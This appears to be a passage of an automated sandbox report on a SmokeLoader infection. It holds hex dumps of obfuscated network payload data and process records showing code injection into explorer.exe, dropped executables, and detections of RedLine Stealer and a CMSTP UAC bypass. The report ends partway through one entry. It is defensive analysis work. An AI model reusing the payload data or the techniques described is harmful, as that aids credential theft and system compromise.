                                                                                                                          Data Ascii: tO x RY x KQ x kY x Oxx x RQ x kO x kO x kk x tt x RR x kt x RR x RQ x YO x tk x KQ x QQ x to x RR x OOk x QQ x OOx x ko x RY x Qk x OxQ x Oxk x OoO x QQ x Yx x Yt x OxQ x Oxx x Rt x YE x OOt x Qx x kk x kO x OOQ x Rk x kO x kQ x tK x tY x OOO x Qx x tE
                                                                                                                          2021-10-29 15:07:02 UTC2853INData Raw: 20 51 78 20 78 20 59 78 20 78 20 59 52 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 52 6b 20 78 20 52 51 20 78 20 4f 78 74 20 78 20 74 74 20 78 20 52 74 20 78 20 74 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 74 74 20 78 20 51 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 78 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 6b 45 20 78 20 6b 59 20 78 20 4b 6b 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 6b 4f 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 78 74 20 78 20 51
                                                                                                                          Data Ascii: Qx x Yx x YR x OxE x kK x tO x Oxk x OOR x Qt x kk x ko x Oxk x Qx x Rk x RQ x Oxt x tt x Rt x tE x tO x RY x KQ x kY x RQ x RY x Oox x tt x Qk x kY x Yx x kR x OxR x Oxx x tO x Oxk x OOx x Qk x OoO x RR x kE x kY x Kk x RQ x OxE x kO x Yx x Yt x Oxt x Q
                                                                                                                          2021-10-29 15:07:02 UTC2857INData Raw: 59 20 78 20 4b 74 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 4f 4f 4b 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 52 51 20 78 20 74 78 20 78 20 52 52 20 78 20 6b 4f 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 6b 51 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 51 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 59 45 20 78 20 4b 51 20 78 20 51 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4b 51 20 78 20 51 51 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 59 78 20 78 20 59 74
                                                                                                                          Data Ascii: Y x Kt x RR x OxE x OxE x OOK x RR x OxE x RQ x tx x RR x kO x QQ x OOQ x RY x OOO x kQ x Ooo x Qt x to x ko x Kk x QQ x Rk x OOO x OOk x tR x Yx x tk x OoO x Oxx x Rt x YE x KQ x QQ x Yx x kR x OoO x Oxx x to x tK x KQ x QQ x YO x kO x OOt x kQ x Yx x Yt
                                                                                                                          2021-10-29 15:07:02 UTC2869INData Raw: 20 78 20 52 51 20 78 20 6b 4f 20 78 20 74 74 20 78 20 52 59 20 78 20 59 6f 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 51 20 78 20 52 52 20 78 20 4f 6f 78 20 78 20 74 74 20 78 20 74 6f 20 78 20 6b 59 20 78 20 59 78 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 4f 78 51 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 52 6b 20 78 20 52 51 20 78 20 6b 51 20 78 20 74 74 20 78 20 52 52 20 78 20 6b 51 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 51 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 74 74 20 78 20 6b 78 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 78 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 52 52
                                                                                                                          Data Ascii: x RQ x kO x tt x RY x Yo x tO x RY x KQ x kY x RQ x RR x Oox x tt x to x kY x Yx x tx x OOY x Qx x OxQ x Yt x OoO x Qx x Rk x RQ x kQ x tt x RR x kQ x tO x RY x KQ x kY x RQ x Rt x OxK x tt x kx x kY x Yx x kR x OxR x Oxx x tO x Oxk x OOx x Qk x OoO x RR
                                                                                                                          2021-10-29 15:07:02 UTC2873INData Raw: 59 59 20 78 20 4f 6f 78 20 78 20 4f 6f 78 20 78 20 6b 51 20 78 20 6b 6f 20 78 20 4f 4f 4b 20 78 20 4b 45 20 78 20 6b 78 20 78 20 6b 74 20 78 20 4f 4f 59 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 51 74 20 78 20 51 51 20 78 20 6b 74 20 78 20 74 51 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 6f 20 78 20 4b 45 20 78 20 74 6f 20 78 20 4f 6f 6f 20 78 20 6b 78 20 78 20 4f 78 4b 20 78 20 4b 74 20 78 20 4f 4f 45 20 78 20 4f 4f 6b 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 59 59 20 78 20 6b 74 20 78 20 74 6f 20 78 20 59 6f 20 78 20 4f 6f 4f 20 78 20 74 45 20 78 20 4b 51 20 78 20 4f 4f 6f 20 78 20 59 78 20 78 20 4f 4f 4b 20 78 20 74 6f 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 51 78 20 78 20 74 6f 20
                                                                                                                          Data Ascii: YY x Oox x Oox x kQ x ko x OOK x KE x kx x kt x OOY x kR x RR x OOx x Qt x QQ x kt x tQ x Yt x kk x OOx x kO x OOK x Oxo x KE x to x Ooo x kx x OxK x Kt x OOE x OOk x OxQ x OxY x YY x kt x to x Yo x OoO x tE x KQ x OOo x Yx x OOK x to x Kk x kY x Qx x to
                                                                                                                          2021-10-29 15:07:02 UTC2889INData Raw: 52 20 78 20 6b 52 20 78 20 74 51 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 6b 6b 20 78 20 6b 6b 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 4f 4f 20 78 20 4f 6f 4f 20 78 20 52 74 20 78 20 4f 6f 4f 20 78 20 4b 6b 20 78 20 4f 78 6b 20 78 20 4f 78 4b 20 78 20 52 52 20 78 20 74 4f 20 78 20 4f 6f 4f 20 78 20 4f 4f 59 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 4f 4f 45 20 78 20 4f 78 6f 20 78 20 6b 45 20 78 20 4f 4f 4f 20 78 20 74 78 20 78 20 59 74 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 59 59 20 78 20 74 4b 20 78 20 4b 74 20 78 20 6b 6f 20 78 20 51 74 20 78 20 4f 4f 4f 20 78 20 74 52 20 78 20 4f 78 6b 20 78 20 74 4b 20 78 20 6b 74 20 78 20 51 78 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 74 6f 20 78 20 74 52 20 78
                                                                                                                          Data Ascii: R x kR x tQ x RR x Oxt x kk x kk x Oxo x RY x YO x OOO x OoO x Rt x OoO x Kk x Oxk x OxK x RR x tO x OoO x OOY x tk x OOY x OOE x Oxo x kE x OOO x tx x Yt x Qk x OOQ x YY x tK x Kt x ko x Qt x OOO x tR x Oxk x tK x kt x Qx x RY x OOo x Qk x tO x to x tR x
                                                                                                                          2021-10-29 15:07:02 UTC2901INData Raw: 74 20 78 20 6b 78 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 4f 4f 52 20 78 20 4f 6f 4f 20 78 20 52 74 20 78 20 4f 78 6b 20 78 20 51 74 20 78 20 4f 4f 59 20 78 20 4f 4f 59 20 78 20 45 6f 20 78 20 45 4b 20 78 20 45 4b 20 78 20 59 4f 20 78 20 59 78 20 78 20 45 4b 20 78 20 45 4b 20 78 20 45 6f 20 78 20 4b 74 20 78 20 52 74 20 78 20 4f 4f 4f 20 78 20 4f 78 51 20 78 20 4f 78 51 20 78 20 51 74 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 74 52 20 78 20 4f 78 59 20 78 20 4f 4f 78 20 78 20 4f 78 4f 20 78 20 45 6f 20 78 20 45 4b 20 78 20 45 4b 20 78 20 45 6f 20 78 20 4b 74 20 78 20 6b 45 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 4f 4f 4b 20 78 20 4f 4f 52 20 78 20 52 6b 20 78 20 4f 78 59 20 78 20 4f 4f 4b 20
                                                                                                                          Data Ascii: t x kx x OOK x OxY x OOO x OOK x OxY x OOR x OoO x Rt x Oxk x Qt x OOY x OOY x Eo x EK x EK x YO x Yx x EK x EK x Eo x Kt x Rt x OOO x OxQ x OxQ x Qt x OOx x Oxx x tR x OxY x OOx x OxO x Eo x EK x EK x Eo x Kt x kE x OOR x Qt x OOK x OOR x Rk x OxY x OOK
                                                                                                                          2021-10-29 15:07:02 UTC2917INData Raw: 78 20 4f 6f 4f 20 78 20 4f 78 52 20 78 20 4f 4f 45 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 4f 78 45 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 4f 78 78 20 78 20 45 74 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 4f 78 6f 20 78 20 51 51 20 78 20 4f 4f 6b 20 78 20 4f 78 4f 20 78 20 4f 78 52 20 78 20 4f 78 52 20 78 20 4f 78 4b 20 78 20 4f 78 52 20 78 20 4f 4f 78 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4f 4f 45 20 78 20 4f 4f 6b 20 78 20 4f 6f 6f 20 78 20 4f 78 4f 20 78 20 4f 4f 6b 20 78 20 4f 4f 78 20 78 20 45 74 20 78 20 51 51 20 78 20 45 74 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 4f 4f 6b 20 78 20 4f 78 59 20 78 20 4f 4f 45 20 78 20 4f 78 52 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4f 78 4f
                                                                                                                          Data Ascii: x OoO x OxR x OOE x OxQ x Oxk x OOY x OxE x OOY x Et x Oxx x Et x Oxk x OOY x Oxo x QQ x OOk x OxO x OxR x OxR x OxK x OxR x OOx x Et x OxY x Et x OOE x OOk x Ooo x OxO x OOk x OOx x Et x QQ x Et x OxQ x Oxk x OOR x OOk x OxY x OOE x OxR x Oxk x Oxx x OxO
                                                                                                                          2021-10-29 15:07:02 UTC2933INData Raw: 4f 4f 59 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 4f 6f 6f 20 78 20 4f 4f 4f 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 4f 4f 6f 20 78 20 4f 4f 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 59 20 78 20 4f 78 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 45 74 20 78 20 51 74 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 4f 4f 52 20 78 20 4f 78 59 20 78 20 4f 4f 4b 20 78 20 4f 6f 4f 20 78 20 4f 6f 6f 20 78 20 4f 78 52 20 78 20 4f 4f 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 4f 20 78 20 4f 78 78 20 78 20 4f 4f 78 20 78 20 45 74 20 78 20 51 6b 20 78 20 45 74
                                                                                                                          Data Ascii: OOY x Oxk x OOY x Oxt x Qk x OOx x Et x OxY x Et x OxY x Ooo x OOO x OOx x Oxx x Et x OOY x Et x OOo x OOk x OOk x OxY x Oxx x Qk x OOx x Oxx x OxE x OxE x Et x Qt x Et x OOY x OOR x OxY x OOK x OoO x Ooo x OxR x OOk x OOk x OxO x Oxx x OOx x Et x Qk x Et
                                                                                                                          2021-10-29 15:07:02 UTC2949INData Raw: 4b 74 20 78 20 6b 6f 20 78 20 4f 4f 74 20 78 20 4f 4f 78 20 78 20 78 20 6b 59 20 6b 45 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 4f 4f 52 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 51 6f 20 78 20 52 74 20 78 20 4f 78 6b 20 78 20 51 74 20 78 20 4f 4f 59 20 78 20 4f 4f 59 20 78 20 4f 78 4f 20 78 20 4f 4f 59 20 78 20 51 6f 20 78 20 74 78 20 78 20 4f 4f 4f 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4f 78 4f 20 78 20 4f 4f 4b 20 78 20 51 6f 20 78 20 4f 4f 59 20 78 20 4f 78 4b 20 78 20 4f 78 4f 20 78 20 4f 78 6b 20 78 20 4f 78 6b 20 78 20 51 6f 20 78 20 4f 4f 4f 20 78 20 4f 4f 6f 20 78 20 4f 78 4f 20 78 20 4f 4f 78 20 78 20 51 6f 20 78 20 51 51 20 78 20 4f 4f 4f 20 78 20 4f 78 51 20 78 20 4f 78 51 20 78 20 51 74 20 78 20
                                                                                                                          Data Ascii: Kt x ko x OOt x OOx x x kY kE x OOO x Oxo x OOR x OOQ x Qt x OOK x OxO x Qo x Rt x Oxk x Qt x OOY x OOY x OxO x OOY x Qo x tx x OOO x Oxk x Oxx x OxO x OOK x Qo x OOY x OxK x OxO x Oxk x Oxk x Qo x OOO x OOo x OxO x OOx x Qo x QQ x OOO x OxQ x OxQ x Qt x
                                                                                                                          2021-10-29 15:07:02 UTC2965INData Raw: 6b 45 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 74 6b 20 78 20 51 74 20 78 20 4f 78 51 20 78 20 4f 78 4f 20 78 20 52 4f 20 78 20 45 4b 20 78 20 52 74 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 4f 6f 20 78 20 6b 52 20 78 20 6b 78 20 78 20 74 6b 20 78 20 45 4b 20 78 20 4f 45 20 78 20 4f 78 20 78 20 4f 45 20 78 20 4f 78 20 78 20 78 20 59 51 20 51 51 20 78 20 59 6b 20 78 20 51 6f 20 78 20 4f 4f 51 20 78 20 4f 78 59 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 51 6f 20 78 20 4f 4f 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 59 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 4f 78 51 20 78 20 59 4f 20 78 20 59 78 20 78 20 51 6f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 4f 4f 59 20 78 20 4f 4f 52 20 78 20 4f 4f 6f
                                                                                                                          Data Ascii: kE x OOk x QQ x tk x Qt x OxQ x OxO x RO x EK x Rt x OOO x OOK x OOo x kR x kx x tk x EK x OE x Ox x OE x Ox x x YQ QQ x Yk x Qo x OOQ x OxY x OOx x Oxx x OOO x OOQ x OOY x Qo x OOY x OoO x OOY x OOR x OxO x OxQ x YO x Yx x Qo x QQ x OxQ x OOY x OOR x OOo
                                                                                                                          2021-10-29 15:07:02 UTC2981INData Raw: 20 52 45 20 52 6f 20 4f 45 20 4f 78 20 4f 45 20 4f 78 20 52 78 20 51 74 20 4f 4f 59 20 4f 4f 59 20 4f 78 4f 20 4f 78 51 20 51 6b 20 4f 78 6b 20 4f 6f 4f 20 45 6f 20 4f 6f 78 20 4f 78 51 20 4f 78 6b 20 4f 4f 78 20 4f 4f 59 20 52 4f 20 45 4b 20 4f 4f 74 20 4f 4f 4b 20 4f 4f 78 20 59 6b 20 4f 4f 59 20 51 51 20 4f 78 4b 20 4f 78 4f 20 4f 78 51 20 51 74 20 4f 4f 59 20 4b 59 20 4f 78 51 20 4f 78 59 20 51 51 20 4f 4f 4b 20 4f 4f 4f 20 4f 4f 59 20 4f 4f 4f 20 4f 78 6f 20 4f 4f 52 20 4b 59 20 51 51 20 4f 4f 4f 20 4f 78 51 20 59 6b 20 51 74 20 4f 4f 59 20 4f 78 51 20 4b 52 20 4f 4f 6b 20 4b 51 20 45 4b 20 45 6f 20 4f 78 51 20 51 74 20 4f 4f 78 20 4f 78 59 20 4f 78 6f 20 4f 78 4f 20 4f 4f 59 20 4f 4f 52 20 6b 52 20 4f 78 4f 20 4f 4f 4b 20 4f 4f 59 20 4f 78 59 20 4f
                                                                                                                          Data Ascii: RE Ro OE Ox OE Ox Rx Qt OOY OOY OxO OxQ Qk Oxk OoO Eo Oox OxQ Oxk OOx OOY RO EK OOt OOK OOx Yk OOY QQ OxK OxO OxQ Qt OOY KY OxQ OxY QQ OOK OOO OOY OOO Oxo OOR KY QQ OOO OxQ Yk Qt OOY OxQ KR OOk KQ EK Eo OxQ Qt OOx OxY Oxo OxO OOY OOR kR OxO OOK OOY OxY O


                                                                                                                          Code Manipulations

                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          Analysis Process: SYzU0M7gx6.exe PID: 6048 Parent PID: 6096

                                                                                                                          General

                                                                                                                          Start time:17:05:27
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\Desktop\SYzU0M7gx6.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Users\user\Desktop\SYzU0M7gx6.exe'
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:347136 bytes
                                                                                                                          MD5 hash:A9E51D671615E79CDB9CB22AA80401AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: SYzU0M7gx6.exe PID: 852 Parent PID: 6048

                                                                                                                          General

                                                                                                                          Start time:17:05:32
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\Desktop\SYzU0M7gx6.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Users\user\Desktop\SYzU0M7gx6.exe'
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:347136 bytes
                                                                                                                          MD5 hash:A9E51D671615E79CDB9CB22AA80401AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.306623599.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.306542749.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: explorer.exe PID: 3292 Parent PID: 852

                                                                                                                          General

                                                                                                                          Start time:17:05:40
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                          Imagebase:0x7ff662bf0000
                                                                                                                          File size:3933184 bytes
                                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000000.288440777.0000000002861000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6148 Parent PID: 560

                                                                                                                          General

                                                                                                                          Start time:17:05:54
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff641cd0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: dtrsehc PID: 6312 Parent PID: 1104

                                                                                                                          General

                                                                                                                          Start time:17:06:14
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Roaming\dtrsehc
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\dtrsehc
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:347136 bytes
                                                                                                                          MD5 hash:A9E51D671615E79CDB9CB22AA80401AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 9A51.exe PID: 6348 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:15
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9A51.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\9A51.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:346624 bytes
                                                                                                                          MD5 hash:700EA4A91C03D0A6E73F2E8769991D05
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 9A51.exe PID: 6440 Parent PID: 6348

                                                                                                                          General

                                                                                                                          Start time:17:06:23
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9A51.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\9A51.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:346624 bytes
                                                                                                                          MD5 hash:700EA4A91C03D0A6E73F2E8769991D05
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.368282987.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.368357098.00000000005B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: dtrsehc PID: 6452 Parent PID: 6312

                                                                                                                          General

                                                                                                                          Start time:17:06:23
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Roaming\dtrsehc
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\dtrsehc
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:347136 bytes
                                                                                                                          MD5 hash:A9E51D671615E79CDB9CB22AA80401AD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 2049.exe PID: 6148 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:36
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\2049.exe
                                                                                                                          Imagebase:0x570000
                                                                                                                          File size:512512 bytes
                                                                                                                          MD5 hash:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.509422650.0000000005C00000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.509654800.0000000005FF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\2049.exe, Author: Florian Roth
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 30%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 3113.exe PID: 5632 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:39
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\3113.exe
                                                                                                                          Imagebase:0xa80000
                                                                                                                          File size:22528 bytes
                                                                                                                          MD5 hash:787AF677D0C317E8062B9705CB64F951
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\3113.exe, Author: Florian Roth
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 22%, ReversingLabs
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 3C9D.exe PID: 5908 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:44
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\3C9D.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\3C9D.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:212992 bytes
                                                                                                                          MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.432262318.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.433825471.0000000004B61000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000003.413492109.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 80%, ReversingLabs
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 5508.exe PID: 6284 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:49
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\5508.exe
                                                                                                                          Wow64 process (32bit):true
